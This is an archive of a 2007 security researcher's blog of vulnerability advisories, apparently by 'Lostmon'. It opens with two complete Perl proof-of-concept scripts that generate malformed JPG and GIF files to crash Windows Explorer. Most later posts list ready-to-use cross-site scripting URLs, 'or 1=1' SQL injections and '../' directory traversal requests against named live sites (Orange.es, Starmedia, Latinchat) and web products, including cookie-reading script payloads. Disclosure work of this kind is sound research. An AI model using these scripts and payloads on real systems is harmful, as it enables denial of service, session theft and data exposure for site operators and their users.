http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx

Download Exploit Word file DoS :

http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar

Download exploit BID 16167:

http://www.securityfocus.com/data/
vulnerabilities/exploits/WMF-DoS.rar

Exploit BID 25207 :
########################################################
#!/usr/bin/perl

#Bug found and ExpLoitEd by CrazyAngel
# Greets: st0rke, Elite, P0uya_s3rv3r, Aria
# ThnX ALL Shabgard.Org Members Specially Moderators and Clans

print "\nJPG PoC denial of service exploit by CrazyAngel ";
print "\n\ngenerating something.jpg...";
open(JPG, ">./something.jpg") or die "cannot create jpg file\n";
print JPG "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x72\x65\x7A\x61\x2E\x65";
print JPG "\x78\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print JPG "\x00\x00\x00\x00";
close(JPG);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

##########################################################


Save Gif file gdi32.dll DoS :

##########################################################
#!/usr/bin/perl
##########################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem

print "\nGIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>";
print "\n\ngenerating Art.gif...";
print "\n\nUsage :";
print "\n\n1- Mouse Over Art.gif For Excute Exploit ";
print "\n\n2- Single Click Art.gif For Excute Exploit ";
print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "\n\n4- More... ";
print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file\n";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";
print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
close(gif);
print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";

# milw0rm.com [2007-07-23]
########################################################

Save EFA_test.vbs:

#######################
EFA_test.vbs
########################

Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next
#########################################################

######################## €nd #########################

Thnx to estrella to be my ligth
Thnx To FalconDeOro Hi is investigate and documented with me this issue.
Thnx to Icaro and Badchecksum Team for interesting in research.
Thnx To Jkouns and Jericho for his patience.
Thnx to All osvdb Maglers they are involved in a very nice project.
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers
Thnx to All Lostmon´s Group Team

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Google custom search engine contributors invite XSS

Tuesday, August 07, 2007
#####################################################
Google custom search engine contributors invite XSS
Vendor url: http://www.google.com
Product Url: http://www.google.com/coop/cse/
Advisore url:http://lostmon.blogspot.com/2007/08/
google-custom-search-engine.html
Vendor notify :yes vendor confirmed: yes Fixed: YES
#####################################################

Description:

A Custom Search Engine is a tailored search experience,
built using Google's core search technology, which
prioritizes or restricts search results based on websites
and pages that you specify, and which can be tailored to
reflect your point of view or area of expertise.

Google Custom search Engine have a flaw that allows a remote
cross site scripting attack.This flaw exists because the
application does not validate The texarea in the wen preview
a invite.This could allow a user to create a specially
invite that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.

################
timeline
###############

discovered: 31-07-2007
vendor notifY 31-07-2007
vendor response:31-07-2007
vendor fix:07-08-2007 (i test it today)
disclosure:07-08-2007

####################
explanation
###################



Go to

http://www.google.com/coop/manage/cse/collaboration?cx=[tokem-of search engine]

and in 'Add a personal note to the invitation' write some javascript
or html code and them click on 'invite preview'
this code is execute...

Also the form convert to hexa with semicoloms to html :


it works transform to html code , but it does not execute it :)

we can try to convert it in decimal values and it show too the
html without execute it.
Only works with 'simple' html

######################### €nd ########################

Thnx To estrella To be my ligth
Thnx to all Lostmon Team !!

-
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Orange.es Starmedia y latinchat vulnerables

Monday, August 06, 2007
#################################################
Orange.es Starmedia y latinchat vulnerables a
ataques de tipo Cross-site Scripting.
Articulo original:http://lostmon.blogspot.com/
2007/08/orangees-starmedia-y-latinchat.html
#################################################

Hace varios dias que intente ponerme en contacto
con el webmaster tanto de starmedia ,orange para
notificarles una serie de vulnerabilidades en sus
paginas.Hasta tres correos en diferentes fechas sin
Obtener ninguna respuesta por parte del grupo.

Estas paginas , estan afectadas por una vulnerabilidad
llamada Cross site scripting,Atraves de la cual se puede
ejecutar codigo html o javascript en el contexto de seguridad
entre el servidor y el usuario cliente.

Asi pues si visitais estas paginas y usais sus servicios
ir con cuidado y comprobar las URL que visitais de las mismas
y que no haya nada extraño en ellas.


###################################
Sobre el dominio:*.orange.es
###################################

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado"><script>
alert()</script>&xargs=&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen"><script>alert()</script>
&filtrofamiliar=Desactivado&xargs="&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=">
<script>alert()</script>&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=&estat=
"><script>alert()</script>

http://busca.orange.es/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=


http://busca.orange.es/search?buscar=todo+spice+girls
&first=&rbpref=pref&destino=web&filtrofamiliar=Activado
"><script>alert()</script>&xargs=&estat=

Todas las variables de la siguiente url estan afectadas
menos la y , la x , la rbpref y slanguage.


http://busca.orange.es/search?buscar=sss&iall=1&exact=zzz&
iexact=1&any=zzzz&iany=1&none="><script>alert()</script>&
inone=1&date=3&pais=latinamerica&format=&domain=&domain_pers
=&slanguage=&rbpref=advanced&lang=&x=44&y=13

http://cine.orange.es/buscador/contenidos.html?&text=
%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E

http://cine.orange.es/encuestas/encuestas.html?id=3801
"><script>alert()</script>


http://foros.orange.es/forosw/servlet/buscarForos?query=
"><script>alert()</script>


http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385&re="><script>alert()</script>

http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385"><script>alert()</script>&re=blah


http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=415
"><script>alert()</script> // sin estar logeado.

http://tonosdeespera.orange.es/RingBackTones/servlet/web/
TonosCategoria?identificador=5117154&TitCat=Pop+Rock+
Internacional"><script>alert()</script>

http://personales.orange.es/orange/site/siteBuscador?
palabras="><script>alert()</script>
&idcategoria=#busquedas


###################################
En sus Chats.
###################################

se puede llamar a una ventana de privado sin estar en el chat:
y ademas el parametro username de usuario al que abrimos el
privado es tambien vulnerable:

http://disp011-org.orange.es/magma_qa/templates/T12/
0/privat.html?
UserName=Lostmon"><script>alert()</script>

http://dhtml.orange.es/magma_qa/templates/T12/R0/
showlogin.html?TEMPLATE=12&CLIENT=JAVA&area=G32&
InstanceID=R32_7-1&UserName=Lostmon

ademas las cajas para introducir texto para enviar al canal o
la caja de mensage a enviar en el privado tambien permite el
envio de codigo XSS esperimentando,con los chats , tal vez
sea asi mismo posible enviar codigo XSS a los demas usuarios
( no lo he probado)


############################
Starmedia
##########################

como puede verse en la siguiente url , el caso es el mismo
que en el dominio orange.es.

La estructura web sigue el mismo patron
con lo cual podemos pensar que es el mismo tipo de sistema

y posee las mismas vulnerabilidades ( y asi es ).

http://busca.starmedia.com/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=

tabien esta afectado de la misma manera y al ser el mismo tipo de
sistema en el chat (latinchat)
tambien posee las mismas vulnerabilidades.



http://login04.latinchat.com/magma_qa/templates/modules/
result/T2.php?UserName=Lostmon"><script>
alert()</script>&InstanceID=R31_1-1

##################### €nd ##############################

Thnxs To estrella to be my ligth
Thnx to all Lostmon team !

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Crashing Safari 3.0.3 for Windows Step by Step

Friday, August 03, 2007
A few days a go i Publish in my blog ,a guide ,
about how to crash safari 3.0.2 step by step.


http://lostmon.blogspot.com/2007/07/
crashing-safari-302-for-windows-step-by.html


Apple prevent to fix in the next version or release, but today i test
safari for windows 3.0.3 and this flaw
continue exist in this version too :((

Other crash could be done wen try to print any document ,in safari 3.0.3

--
atentamente:
Lostmon (lost...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)


--
La curiosidad es lo que hace mover la mente....

ifoto traversal folder enumeration

Wednesday, July 25, 2007
#################################################
ifoto traversal folder enumeration
Vendor url:http://ifoto.ireans.com/
Advisore:http://lostmon.blogspot.com/2007/07/
ifoto-traversal-folder-enumeration.html
vendor notify:no exploit include:yes
Secunia:SA26186
BID:25065
SecWatch: SWID1018593
#################################################


ifoto contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'dir' variable upon submission
to 'index.php' scripts.This could allow a remote users to
create a specially crafted URL that would execute '../'
directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.



################
versions
################

ifoto 1.0


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 18-07-2007
vendor notify:---
vendor response:---
disclosure:25-07-2007


#####################
Examples
#####################


http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://[victims]/ifoto/?dir=../../../../../../etc
http://[victims]/ifoto/index.php?dir=../../../../../../


################# €nd ############################


--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Vikingboard multiple Cross site scripting

#################################################
Vikingboard multiple Cross site scripting
Vendor url: http://vikingboard.com/
advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-multiple-cross-site.html
vendor notify:yes exploit include:yes
Secunia:SA26196
BID:25056
SecWatch:SWID1018567
#################################################


Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.



Vikingboard contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.



################
versions
################

Vikingboard 0.1.2


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure:25-07-2007


#####################
Examples
#####################


http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]
http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]
http://localhost/viking/cp.php?mode=6"e=1[XSS-CODE]
http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]

http://localhost/viking/user.php?u=2[XSS-CODE]
http://localhost/viking/help.php?act=guidelines[XSS-CODE]


we can call the debug parameter to obtain sensitive information.


http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0

wen send a private message the field "Message Title " is affected

http://localhost/viking/cp.php?mode=6

we can send a PM with a malformed XSS title to others users
and it is executed wen the vicims go to Inbox on his control panel

http://localhost/viking/cp.php?mode=7&f=1

http://localhost/viking/report.php?p=2[XSS-CODE]


http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]

http://localhost/viking/post.php?mode=03&t=2"e=2[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]"e=2
http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]

http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]

http://localhost/viking/search.php?search=user:administrator&act=dosearch

if the user has any script code in the first lines of any post
wen try fo find all post by this user , and wen the applications
show the results it is executed

##################### €nd ##############################

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

Vikingboard debug information disclosure

#################################################
Vikingboard debug information disclosure
Vendor url:http://vikingboard.com/
Advisore:http://lostmon.blogspot.com/2007/07/
vikingboard-debug-information.html
vendor notify:yes exploit include:yes
#################################################


Vikingboard is a PHP-based community board designed by
the principle of “less is more”, and features a powerful
web-based extension-system, a lighting-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.



Vikingboard has a weakness, which can be exploited by malicious
people to disclose some system information.

The weakness is caused due to a design error where debug
information can be disclosed by specifying the "debug" parameter.



################
versions
################

Vikingboard 0.1.2


################
Solution:
################

No solution was available at this time !!!

################
TimeLine
################

Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007


#####################
Examples
#####################


http://localhost/viking/forum.php?f=1&debug=1
http://localhost/viking/cp.php?mode=10&debug=1
http://localhost/viking/cp.php?&debug=1

################# €nd ############################

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

AlstraSoft Multiple products multiple Vulnerabilities

Sunday, July 22, 2007
####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor urL:http://www.alstrasoft.com/products.htm
Advisore url:http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify:yes (webform) Exploit included: yes
BID:25022, 25023, 25026
####################################################



Multiple products of Alstrasoft Are prone vulnerables
to Cross site scripting and SQL injections style attacks



################
examples
################

For exploit some flaws you need to login

#####################################
AlstraSoft Video Share Enterprise
#####################################


http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr

http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>

http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>

http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr

http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=

http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>

http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>

http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>


http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search

http://[Victim]/videoshare/siteadmin/muser.php?
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>


path disclosure:

http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>

http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>

http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'

http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>

http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>

SQL injection :

http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1

http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1



###########################################
AlstraSoft Text Ads Enterprise
###########################################

http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>

http://[Victim]/ads/search_results.php?query="><script>alert()</script>

http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>

http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>


#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################


http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>

http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit


#################################################
e-friends

http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>

this is a persistent XSS


########################################
AlstraSoft Affiliate Network Pro
########################################

http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS

http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act

http://[Victim]/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affceted except Act y sub

http://[Victim]/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // posible SQL too

http://[Victim]/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=

####################################
AlstraSoft Article Manager Pro
####################################

http://[Victim]/article/contact_author.php?
userid=1%20"><script>alert()</script>

#######################################
AlstraSoft AskMe Pro
#######################################

http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL

http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL

http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>

###################### €nd ########################

Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

Crashing Safari 3.0.2 for windows Step by Step

Friday, July 13, 2007
Safari for windows 3.0.2 Crash Step by step

http://www.apple.com/safari/download/


The Bug come from activity window wen manage
diferents tab accross the activity window.
I report it to vendor and they working for
debugging this flaw and others (i think).

Version afected:

Safari for windows 3.0.2 (512.13.1)
i don´t know if this issue colud be done
in other versions.

And i don´t know if with this issue a local or
remote user can execute code.

Let´s Go

1 - open a safari window.
2 - open a new tab in the same window (now we are in the second tab)
3 - open Window/activity (we have the two tabs)
4 - click on the first tab in the activity window (safari crashing)

other way :

1 open a safari window ( window 1 )
2 open a new tab in window 1
3 open a new safari window (window 2)
4 open a new tab in window 2 (now we are in the window 2 tab 2)
5 open window/activity (we have the four tabs )
6 doble click in any tab of the window 1 (safari crashing)

I working in a html file to demostrate that this posible vuln can exploit
by a remote user. Any sugention or idea are welcome to Lostmon@gmail.com
Thnx to all !!

Whatch this 'mov' to look the step by step with the video:




Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

NetFlow Analizer 5 & OpManager 7 multiple XSS

Wednesday, July 04, 2007
###################################################
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################

NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.



#####################
Versions afected:
#####################

OpManager 7
OpManager 6

NetFlow Analizer 5

other versions can be vulnerables too

###################
Solution:
###################

No solutions was available at this time !!!

##################
Time Line
##################

Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007

###################
Examples
###################

for exploit some flaws you need to login.

#####################
OpManager
#####################

http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E


http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E

http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map


http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil


http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E

http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil


http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
